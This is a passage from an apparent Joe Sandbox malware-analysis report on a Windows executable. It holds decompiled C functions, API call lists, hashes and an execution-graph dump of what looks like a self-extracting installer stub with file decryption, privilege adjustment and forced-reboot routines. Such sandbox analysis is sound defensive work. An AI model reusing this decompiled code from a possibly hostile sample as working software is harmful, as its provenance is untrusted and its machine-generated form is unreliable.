                                                                                                                                                                                                      • Instruction ID: 82ea448c8590ef3c83c206668e4e4d3c5af365ea599981502f956b95eaa3e1bc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5f00f28a266af7373e8d2531cf8af31c42874ddd1c5ba64d967d3ac4ad0f99
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF044720098416EE7320B7A8C888BBAF9CCBC725DBAD41BFE48DB2000D2150D4A86A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E769B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xe781f8 = E00E76C70();
                                                                                                                                                                                                      				__set_app_type(E00E76FBE(2));
                                                                                                                                                                                                      				 *0xe788a4 =  *0xe788a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xe788a8 =  *0xe788a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xe78528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xe7851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E00E77000();
                                                                                                                                                                                                      				if( *0xe78000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E00E77000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E771EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00e769b7
                                                                                                                                                                                                      0x00e769c2
                                                                                                                                                                                                      0x00e769c8
                                                                                                                                                                                                      0x00e769cf
                                                                                                                                                                                                      0x00e769d8
                                                                                                                                                                                                      0x00e769de
                                                                                                                                                                                                      0x00e769e4
                                                                                                                                                                                                      0x00e769e6
                                                                                                                                                                                                      0x00e769ec
                                                                                                                                                                                                      0x00e769f2
                                                                                                                                                                                                      0x00e769f4
                                                                                                                                                                                                      0x00e76a00
                                                                                                                                                                                                      0x00e76a07
                                                                                                                                                                                                      0x00e76a0d
                                                                                                                                                                                                      0x00e76a0e
                                                                                                                                                                                                      0x00e76a15

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E76FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00E76FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00E769C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00E769D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00E769E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 00E76A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: af9787a52b4cda76e8af2fa029bd36df6e40f760e26748b62ca6678793f3d154
                                                                                                                                                                                                      • Instruction ID: ac782fd3ee54eb2bb5b46cecdb63ff2a1c46a200adfde6655bd7f560e2555700
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af9787a52b4cda76e8af2fa029bd36df6e40f760e26748b62ca6678793f3d154
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF0F8705493018FD718EB32BE0E6083BA2FB54335B549619E4ADB62F1CF3A85C9CA12
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76952(CHAR* __ecx) {
                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				_v16 = 0;
                                                                                                                                                                                                      				if( *__ecx != 0) {
                                                                                                                                                                                                      					_t6 =  &_v20; // 0xe75760
                                                                                                                                                                                                      					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                      						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00e7695b
                                                                                                                                                                                                      0x00e76960
                                                                                                                                                                                                      0x00e76963
                                                                                                                                                                                                      0x00e76966
                                                                                                                                                                                                      0x00e76969
                                                                                                                                                                                                      0x00e7696c
                                                                                                                                                                                                      0x00e76972
                                                                                                                                                                                                      0x00e76987
                                                                                                                                                                                                      0x00e7699f
                                                                                                                                                                                                      0x00e7699f
                                                                                                                                                                                                      0x00e76987
                                                                                                                                                                                                      0x00e769a7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00E75760,?,A:\), ref: 00E7697F
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00E76999
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                      • String ID: `W
                                                                                                                                                                                                      • API String ID: 1705453755-2113494416
                                                                                                                                                                                                      • Opcode ID: 91f66a2cf9bd5afd5a715a5da88ef80c4f4a81b271afe0899294af16168d1f53
                                                                                                                                                                                                      • Instruction ID: 66a00b98a25ecce740d92053c9fb6f9d4313a40807eac3897b4717f1b6c83ea1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91f66a2cf9bd5afd5a715a5da88ef80c4f4a81b271afe0899294af16168d1f53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0F9B6D0122CBBDB11DFE9CC44ADEBBBCEB48704F144196E614F3240D6719A449BD1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:962
                                                                                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                                                                                      execution_graph 3119 3e7270 _except_handler4_common 3120 3e69b0 3121 3e69b5 3120->3121 3129 3e6fbe GetModuleHandleW 3121->3129 3123 3e69c1 __set_app_type __p__fmode __p__commode 3124 3e69f9 3123->3124 3125 3e6a0e 3124->3125 3126 3e6a02 __setusermatherr 3124->3126 3131 3e71ef _controlfp 3125->3131 3126->3125 3128 3e6a13 3130 3e6fcf 3129->3130 3130->3123 3131->3128 3132 3e34f0 3133 3e3504 3132->3133 3134 3e35b8 3132->3134 3133->3134 3136 3e35be GetDesktopWindow 3133->3136 3137 3e351b 3133->3137 3135 3e3526 3134->3135 3138 3e3671 EndDialog 3134->3138 3154 3e43d0 6 API calls 3136->3154 3140 3e354f 3137->3140 3141 3e351f 3137->3141 3138->3135 3140->3135 3144 3e3559 ResetEvent 3140->3144 3141->3135 3143 3e352d TerminateThread EndDialog 3141->3143 3143->3135 3145 3e44b9 20 API calls 3144->3145 3148 3e3581 3145->3148 3146 3e361d SetWindowTextA CreateThread 3146->3135 3149 3e3646 3146->3149 3147 3e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147->3146 3150 3e359b SetEvent 3148->3150 3152 3e358a SetEvent 3148->3152 3151 3e44b9 20 API calls 3149->3151 3153 3e3680 4 API calls 3150->3153 3151->3134 3152->3135 3153->3134 3155 3e4463 SetWindowPos 3154->3155 3157 3e6ce0 4 API calls 3155->3157 3158 3e35d6 3157->3158 3158->3146 3158->3147 3159 3e6ef0 3160 3e6f2d 3159->3160 3162 3e6f02 3159->3162 3161 3e6f27 ?terminate@ 3161->3160 3162->3160 3162->3161 3163 3e6bef _XcptFilter 2196 3e4ca0 GlobalAlloc 2197 3e6a60 2214 3e7155 2197->2214 2199 3e6a65 2200 3e6a76 GetStartupInfoW 2199->2200 2201 3e6a93 2200->2201 2202 3e6aa8 2201->2202 2203 3e6aaf Sleep 2201->2203 2204 3e6ac7 _amsg_exit 2202->2204 2206 3e6ad1 2202->2206 2203->2201 2204->2206 2205 3e6b13 _initterm 2210 3e6b2e __IsNonwritableInCurrentImage 2205->2210 2206->2205 2208 3e6af4 2206->2208 2206->2210 2207 3e6bd6 _ismbblead 2207->2210 2209 3e6c1e 2209->2208 2212 3e6c27 _cexit 2209->2212 2210->2207 2210->2209 2213 3e6bbe exit 2210->2213 2219 3e2bfb GetVersion 2210->2219 2212->2208 2213->2210 2215 3e717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 3e717a 2214->2216 2218 3e71cd 2215->2218 2216->2215 2217 3e71e2 2216->2217 2217->2199 2218->2217 2220 3e2c0f 2219->2220 2221 3e2c50 2219->2221 2220->2221 2222 3e2c13 GetModuleHandleW 2220->2222 2236 3e2caa memset memset memset 2221->2236 2222->2221 2225 3e2c22 GetProcAddress 2222->2225 2225->2221 2233 3e2c34 2225->2233 2226 3e2c8e 2228 3e2c9e 2226->2228 2229 3e2c97 CloseHandle 2226->2229 2228->2210 2229->2228 2233->2221 2234 3e2c89 2330 3e1f90 2234->2330 2347 3e468f FindResourceA SizeofResource 2236->2347 2239 3e2ef3 2242 3e44b9 20 API calls 2239->2242 2240 3e2d2d CreateEventA SetEvent 2241 3e468f 7 API calls 2240->2241 2243 3e2d57 2241->2243 2244 3e2d6e 2242->2244 2245 3e2d5b 2243->2245 2247 3e2e1f 2243->2247 2250 3e468f 7 API calls 2243->2250 2352 3e6ce0 2244->2352 2357 3e44b9 2245->2357 2386 3e5c9e 2247->2386 2253 3e2d9f 2250->2253 2251 3e2c62 2251->2226 2277 3e2f1d 2251->2277 2253->2245 2256 3e2da3 CreateMutexA 2253->2256 2254 3e2e3a 2257 3e2e52 FindResourceA 2254->2257 2258 3e2e43 2254->2258 2255 3e2e30 2255->2239 2256->2247 2259 3e2dbd GetLastError 2256->2259 2261 3e2e6e 2257->2261 2262 3e2e64 LoadResource 2257->2262 2412 3e2390 2258->2412 2259->2247 2260 3e2dca 2259->2260 2264 3e2dea 2260->2264 2265 3e2dd5 2260->2265 2268 3e2e4d 2261->2268 2427 3e36ee GetVersionExA 2261->2427 2262->2261 2267 3e44b9 20 API calls 2264->2267 2266 3e44b9 20 API calls 2265->2266 2269 3e2de8 2266->2269 2270 3e2dff 2267->2270 2268->2244 2272 3e2e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 3e2f3f 2277->2278 2279 3e2f6c 2277->2279 2281 3e2f5f 2278->2281 2552 3e51e5 2278->2552 2571 3e5164 2279->2571 2699 3e3a3f 2281->2699 2285 3e2f71 2286 3e303c 2285->2286 2584 3e55a0 2285->2584 2289 3e6ce0 4 API calls 2286->2289 2291 3e2c6b 2289->2291 2317 3e52b6 2291->2317 2292 3e2f86 GetSystemDirectoryA 2293 3e658a CharPrevA 2292->2293 2294 3e2fab LoadLibraryA 2293->2294 2295 3e2ff7 FreeLibrary 2294->2295 2296 3e2fc0 GetProcAddress 2294->2296 2298 3e3006 2295->2298 2299 3e3017 SetCurrentDirectoryA 2295->2299 2296->2295 2297 3e2fd6 DecryptFileA 2296->2297 2297->2295 2306 3e2ff0 2297->2306 2298->2299 2632 3e621e GetWindowsDirectoryA 2298->2632 2300 3e3026 2299->2300 2301 3e3054 2299->2301 2305 3e44b9 20 API calls 2300->2305 2303 3e3061 2301->2303 2642 3e3b26 2301->2642 2303->2286 2308 3e307a 2303->2308 2651 3e256d 2303->2651 2310 3e3037 2305->2310 2306->2295 2312 3e3098 2308->2312 2662 3e3ba2 2308->2662 2718 3e6285 GetLastError 2310->2718 2312->2286 2314 3e30af 2312->2314 2720 3e4169 2314->2720 2318 3e52d6 2317->2318 2323 3e5316 2317->2323 2320 3e5300 LocalFree LocalFree 2318->2320 2322 3e52eb SetFileAttributesA DeleteFileA 2318->2322 2319 3e538c 2321 3e6ce0 4 API calls 2319->2321 2320->2318 2320->2323 2324 3e2c72 2321->2324 2322->2320 2326 3e535e SetCurrentDirectoryA 2323->2326 2327 3e65e8 4 API calls 2323->2327 2329 3e5374 2323->2329 2324->2226 2324->2234 2328 3e2390 13 API calls 2326->2328 2327->2326 2328->2329 2329->2319 3050 3e1fe1 2329->3050 2331 3e1f9a 2330->2331 2332 3e1f9f 2330->2332 2333 3e1ea7 15 API calls 2331->2333 2334 3e1fc0 2332->2334 2337 3e44b9 20 API calls 2332->2337 2338 3e1fd9 2332->2338 2333->2332 2335 3e1fcf ExitWindowsEx 2334->2335 2336 3e1ee2 GetCurrentProcess OpenProcessToken 2334->2336 2334->2338 2335->2338 2340 3e1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2340 2342 3e1f0e 2336->2342 2337->2334 2338->2226 2341 3e1f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 3e1f1f 2341->2343 2344 3e44b9 20 API calls 2342->2344 2345 3e6ce0 4 API calls 2343->2345 2344->2343 2346 3e1f8c 2345->2346 2346->2226 2348 3e46b6 2347->2348 2350 3e2d1a 2347->2350 2349 3e46be FindResourceA LoadResource LockResource 2348->2349 2348->2350 2349->2350 2351 3e46df memcpy_s FreeResource 2349->2351 2350->2239 2350->2240 2351->2350 2353 3e6ce8 2352->2353 2354 3e6ceb 2352->2354 2353->2251 2469 3e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 3e6e26 2356->2251 2358 3e44fe LoadStringA 2357->2358 2359 3e455a 2357->2359 2360 3e4527 2358->2360 2361 3e4562 2358->2361 2363 3e6ce0 4 API calls 2359->2363 2362 3e681f 10 API calls 2360->2362 2367 3e45c9 2361->2367 2373 3e457e 2361->2373 2364 3e452c 2362->2364 2365 3e4689 2363->2365 2366 3e4536 MessageBoxA 2364->2366 2482 3e67c9 2364->2482 2365->2244 2366->2359 2369 3e45cd LocalAlloc 2367->2369 2370 3e4607 LocalAlloc 2367->2370 2369->2359 2374 3e45f3 2369->2374 2370->2359 2381 3e45c4 2370->2381 2373->2373 2376 3e4596 LocalAlloc 2373->2376 2378 3e171e _vsnprintf 2374->2378 2375 3e462d MessageBeep 2470 3e681f 2375->2470 2376->2359 2377 3e45af 2376->2377 2488 3e171e 2377->2488 2378->2381 2381->2375 2383 3e4645 MessageBoxA LocalFree 2383->2359 2384 3e67c9 EnumResourceLanguagesA 2384->2383 2391 3e5e17 2386->2391 2394 3e5cc3 2386->2394 2387 3e6ce0 4 API calls 2388 3e2e2c 2387->2388 2388->2254 2388->2255 2389 3e5ced CharNextA 2389->2394 2390 3e5dec GetModuleFileNameA 2390->2391 2392 3e5e0a 2390->2392 2391->2387 2498 3e66c8 2392->2498 2394->2389 2394->2391 2395 3e6218 2394->2395 2398 3e5e36 CharUpperA 2394->2398 2404 3e5dd0 2394->2404 2405 3e5f9f CharUpperA 2394->2405 2406 3e5f59 CompareStringA 2394->2406 2407 3e6003 CharUpperA 2394->2407 2408 3e5edc CharUpperA 2394->2408 2409 3e60a2 CharUpperA 2394->2409 2411 3e667f IsDBCSLeadByte CharNextA 2394->2411 2503 3e658a 2394->2503 2507 3e6e2a 2395->2507 2398->2394 2399 3e61d0 2398->2399 2400 3e44b9 20 API calls 2399->2400 2401 3e61e7 2400->2401 2402 3e61f7 ExitProcess 2401->2402 2403 3e61f0 CloseHandle 2401->2403 2403->2402 2404->2390 2404->2391 2405->2394 2406->2394 2407->2394 2408->2394 2409->2394 2411->2394 2413 3e24cb 2412->2413 2416 3e23b9 2412->2416 2414 3e6ce0 4 API calls 2413->2414 2415 3e24dc 2414->2415 2415->2268 2416->2413 2417 3e23e9 FindFirstFileA 2416->2417 2417->2413 2418 3e2407 2417->2418 2419 3e2479 2418->2419 2420 3e2421 lstrcmpA 2418->2420 2421 3e24a9 FindNextFileA 2418->2421 2425 3e658a CharPrevA 2418->2425 2426 3e2390 5 API calls 2418->2426 2423 3e2488 SetFileAttributesA DeleteFileA 2419->2423 2420->2421 2422 3e2431 lstrcmpA 2420->2422 2421->2418 2424 3e24bd FindClose RemoveDirectoryA 2421->2424 2422->2418 2422->2421 2423->2421 2424->2413 2425->2418 2426->2418 2432 3e3737 2427->2432 2434 3e372d 2427->2434 2428 3e44b9 20 API calls 2429 3e39fc 2428->2429 2430 3e6ce0 4 API calls 2429->2430 2431 3e2e92 2430->2431 2431->2244 2431->2268 2442 3e18a3 2431->2442 2432->2429 2432->2434 2435 3e38a4 2432->2435 2514 3e28e8 2432->2514 2434->2428 2434->2429 2435->2429 2435->2434 2436 3e39c1 MessageBeep 2435->2436 2437 3e681f 10 API calls 2436->2437 2438 3e39ce 2437->2438 2439 3e39d8 MessageBoxA 2438->2439 2441 3e67c9 EnumResourceLanguagesA 2438->2441 2439->2429 2441->2439 2443 3e18d5 2442->2443 2448 3e19b8 2442->2448 2543 3e17ee LoadLibraryA 2443->2543 2445 3e6ce0 4 API calls 2447 3e19d5 2445->2447 2447->2268 2462 3e6517 FindResourceA 2447->2462 2448->2445 2449 3e18e5 GetCurrentProcess OpenProcessToken 2449->2448 2450 3e1900 GetTokenInformation 2449->2450 2451 3e19aa CloseHandle 2450->2451 2452 3e1918 GetLastError 2450->2452 2451->2448 2452->2451 2453 3e1927 LocalAlloc 2452->2453 2454 3e1938 GetTokenInformation 2453->2454 2455 3e19a9 2453->2455 2456 3e194e AllocateAndInitializeSid 2454->2456 2457 3e19a2 LocalFree 2454->2457 2455->2451 2456->2457 2459 3e196e 2456->2459 2457->2455 2458 3e1999 FreeSid 2458->2457 2459->2458 2460 3e1975 EqualSid 2459->2460 2461 3e198c 2459->2461 2460->2459 2460->2461 2461->2458 2463 3e656b 2462->2463 2464 3e6536 LoadResource 2462->2464 2466 3e44b9 20 API calls 2463->2466 2464->2463 2465 3e6544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 3e657c 2465->2467 2466->2467 2467->2268 2469->2356 2471 3e6857 GetVersionExA 2470->2471 2472 3e6940 2470->2472 2474 3e687c 2471->2474 2481 3e691a 2471->2481 2473 3e6ce0 4 API calls 2472->2473 2475 3e463b 2473->2475 2476 3e68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2383 2475->2384 2477 3e68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3e68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 3e690c 2478->2479 2478->2481 2492 3e66f9 2479->2492 2481->2472 2483 3e6803 2482->2483 2484 3e67e2 2482->2484 2483->2366 2496 3e6793 EnumResourceLanguagesA 2484->2496 2486 3e67f5 2486->2483 2497 3e6793 EnumResourceLanguagesA 2486->2497 2489 3e172d 2488->2489 2490 3e173d _vsnprintf 2489->2490 2491 3e175d 2489->2491 2490->2491 2491->2381 2493 3e670f 2492->2493 2494 3e6740 CharNextA 2493->2494 2495 3e674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2483 2499 3e66d5 2498->2499 2500 3e66f3 2499->2500 2502 3e66e5 CharNextA 2499->2502 2510 3e6648 2499->2510 2500->2391 2502->2499 2504 3e659b 2503->2504 2504->2504 2505 3e65b8 CharPrevA 2504->2505 2506 3e65ab 2504->2506 2505->2506 2506->2394 2513 3e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 3e621d 2511 3e665d IsDBCSLeadByte 2510->2511 2512 3e6668 2510->2512 2511->2512 2512->2499 2513->2509 2515 3e2a62 2514->2515 2522 3e290d 2514->2522 2516 3e2a6e GlobalFree 2515->2516 2517 3e2a75 2515->2517 2516->2517 2517->2435 2519 3e2955 GlobalAlloc 2519->2515 2520 3e2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 3e2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 3e2a80 GlobalUnlock 2522->2523 2524 3e2773 2522->2524 2523->2515 2525 3e28b2 2524->2525 2526 3e27a3 CharUpperA CharNextA CharNextA 2524->2526 2528 3e28b7 GetSystemDirectoryA 2525->2528 2527 3e27db 2526->2527 2526->2528 2529 3e28a8 GetWindowsDirectoryA 2527->2529 2530 3e27e3 2527->2530 2531 3e28bf 2528->2531 2529->2531 2536 3e658a CharPrevA 2530->2536 2532 3e28d2 2531->2532 2534 3e658a CharPrevA 2531->2534 2533 3e6ce0 4 API calls 2532->2533 2535 3e28e2 2533->2535 2534->2532 2535->2522 2537 3e2810 RegOpenKeyExA 2536->2537 2537->2531 2538 3e2837 RegQueryValueExA 2537->2538 2539 3e285c 2538->2539 2540 3e289a RegCloseKey 2538->2540 2541 3e2867 ExpandEnvironmentStringsA 2539->2541 2542 3e287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 3e1826 GetProcAddress 2543->2544 2545 3e1890 2543->2545 2546 3e1889 FreeLibrary 2544->2546 2547 3e1839 AllocateAndInitializeSid 2544->2547 2548 3e6ce0 4 API calls 2545->2548 2546->2545 2547->2546 2550 3e185f FreeSid 2547->2550 2549 3e189f 2548->2549 2549->2448 2549->2449 2550->2546 2553 3e468f 7 API calls 2552->2553 2554 3e51f9 LocalAlloc 2553->2554 2555 3e522d 2554->2555 2556 3e520d 2554->2556 2558 3e468f 7 API calls 2555->2558 2557 3e44b9 20 API calls 2556->2557 2559 3e521e 2557->2559 2560 3e523a 2558->2560 2561 3e6285 GetLastError 2559->2561 2562 3e523e 2560->2562 2563 3e5262 lstrcmpA 2560->2563 2569 3e2f4d 2561->2569 2564 3e44b9 20 API calls 2562->2564 2565 3e527e 2563->2565 2566 3e5272 LocalFree 2563->2566 2568 3e524f LocalFree 2564->2568 2567 3e44b9 20 API calls 2565->2567 2566->2569 2570 3e5290 LocalFree 2567->2570 2568->2569 2569->2279 2569->2281 2569->2286 2570->2569 2572 3e468f 7 API calls 2571->2572 2573 3e5175 2572->2573 2574 3e517a 2573->2574 2575 3e51af 2573->2575 2576 3e44b9 20 API calls 2574->2576 2577 3e468f 7 API calls 2575->2577 2578 3e518d 2576->2578 2579 3e51c0 2577->2579 2578->2285 2733 3e6298 2579->2733 2582 3e51e1 2582->2285 2583 3e44b9 20 API calls 2583->2578 2585 3e468f 7 API calls 2584->2585 2586 3e55c7 LocalAlloc 2585->2586 2587 3e55fd 2586->2587 2588 3e55db 2586->2588 2589 3e468f 7 API calls 2587->2589 2590 3e44b9 20 API calls 2588->2590 2592 3e560a 2589->2592 2591 3e55ec 2590->2591 2593 3e6285 GetLastError 2591->2593 2594 3e560e 2592->2594 2595 3e5632 lstrcmpA 2592->2595 2607 3e55f1 2593->2607 2596 3e44b9 20 API calls 2594->2596 2597 3e564b LocalFree 2595->2597 2598 3e5645 2595->2598 2599 3e561f LocalFree 2596->2599 2600 3e565b 2597->2600 2601 3e5696 2597->2601 2598->2597 2599->2607 2606 3e5467 49 API calls 2600->2606 2602 3e589f 2601->2602 2605 3e56ae GetTempPathA 2601->2605 2603 3e6517 24 API calls 2602->2603 2603->2607 2604 3e6ce0 4 API calls 2608 3e2f7e 2604->2608 2609 3e56c3 2605->2609 2612 3e56eb 2605->2612 2610 3e5678 2606->2610 2607->2604 2608->2286 2608->2292 2745 3e5467 2609->2745 2610->2607 2613 3e44b9 20 API calls 2610->2613 2612->2607 2614 3e586c GetWindowsDirectoryA 2612->2614 2615 3e5717 GetDriveTypeA 2612->2615 2613->2607 2779 3e597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2617 3e5730 GetFileAttributesA 2615->2617 2630 3e572b 2615->2630 2617->2630 2621 3e5467 49 API calls 2621->2612 2622 3e2630 21 API calls 2622->2630 2624 3e57c1 GetWindowsDirectoryA 2624->2630 2625 3e597d 34 API calls 2625->2630 2626 3e658a CharPrevA 2627 3e57e8 GetFileAttributesA 2626->2627 2628 3e57fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 3e5827 SetFileAttributesA 2629->2630 2630->2607 2630->2614 2630->2615 2630->2617 2630->2622 2630->2624 2630->2625 2630->2626 2630->2629 2631 3e5467 49 API calls 2630->2631 2775 3e6952 2630->2775 2631->2630 2633 3e6268 2632->2633 2634 3e6249 2632->2634 2636 3e597d 34 API calls 2633->2636 2635 3e44b9 20 API calls 2634->2635 2637 3e625a 2635->2637 2640 3e625f 2636->2640 2638 3e6285 GetLastError 2637->2638 2638->2640 2639 3e6ce0 4 API calls 2641 3e3013 2639->2641 2640->2639 2641->2286 2641->2299 2643 3e3b2d 2642->2643 2643->2643 2644 3e3b72 2643->2644 2645 3e3b53 2643->2645 2845 3e4fe0 2644->2845 2647 3e6517 24 API calls 2645->2647 2648 3e3b70 2647->2648 2649 3e3b7b 2648->2649 2650 3e6298 10 API calls 2648->2650 2649->2303 2650->2649 2652 3e2622 2651->2652 2653 3e2583 2651->2653 2896 3e24e0 GetWindowsDirectoryA 2652->2896 2654 3e258b 2653->2654 2655 3e25e8 RegOpenKeyExA 2653->2655 2658 3e25e3 2654->2658 2659 3e259b RegOpenKeyExA 2654->2659 2657 3e2609 RegQueryInfoKeyA 2655->2657 2655->2658 2660 3e25d1 RegCloseKey 2657->2660 2658->2308 2659->2658 2661 3e25bc RegQueryValueExA 2659->2661 2660->2658 2661->2660 2663 3e3bdb 2662->2663 2670 3e3bec 2662->2670 2664 3e468f 7 API calls 2663->2664 2664->2670 2665 3e3c03 memset 2665->2670 2666 3e3d13 2667 3e44b9 20 API calls 2666->2667 2674 3e3d26 2667->2674 2669 3e468f 7 API calls 2669->2670 2670->2665 2670->2666 2670->2669 2672 3e3d7b CompareStringA 2670->2672 2670->2674 2675 3e3fd7 2670->2675 2677 3e3fab 2670->2677 2680 3e3f1e LocalFree 2670->2680 2681 3e3f46 LocalFree 2670->2681 2685 3e3cc7 CompareStringA 2670->2685 2696 3e3e10 2670->2696 2904 3e1ae8 2670->2904 2945 3e202a memset memset RegCreateKeyExA 2670->2945 2971 3e3fef 2670->2971 2671 3e6ce0 4 API calls 2673 3e3f60 2671->2673 2672->2670 2672->2675 2673->2312 2674->2671 2675->2674 2995 3e2267 2675->2995 2679 3e44b9 20 API calls 2677->2679 2683 3e3fbe LocalFree 2679->2683 2680->2670 2680->2675 2681->2674 2683->2674 2685->2670 2686 3e3e1f GetProcAddress 2688 3e3f64 2686->2688 2686->2696 2687 3e3f92 2689 3e44b9 20 API calls 2687->2689 2690 3e44b9 20 API calls 2688->2690 2691 3e3fa9 2689->2691 2692 3e3f75 FreeLibrary 2690->2692 2693 3e3f7c LocalFree 2691->2693 2692->2693 2694 3e6285 GetLastError 2693->2694 2695 3e3f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 3e3eff FreeLibrary 2696->2697 2698 3e3f40 FreeLibrary 2696->2698 2985 3e6495 2696->2985 2697->2680 2698->2681 2700 3e468f 7 API calls 2699->2700 2701 3e3a55 LocalAlloc 2700->2701 2702 3e3a8e 2701->2702 2703 3e3a6c 2701->2703 2705 3e468f 7 API calls 2702->2705 2704 3e44b9 20 API calls 2703->2704 2706 3e3a7d 2704->2706 2707 3e3a98 2705->2707 2708 3e6285 GetLastError 2706->2708 2709 3e3a9c 2707->2709 2710 3e3ac5 lstrcmpA 2707->2710 2711 3e2f64 2708->2711 2712 3e44b9 20 API calls 2709->2712 2713 3e3b0d LocalFree 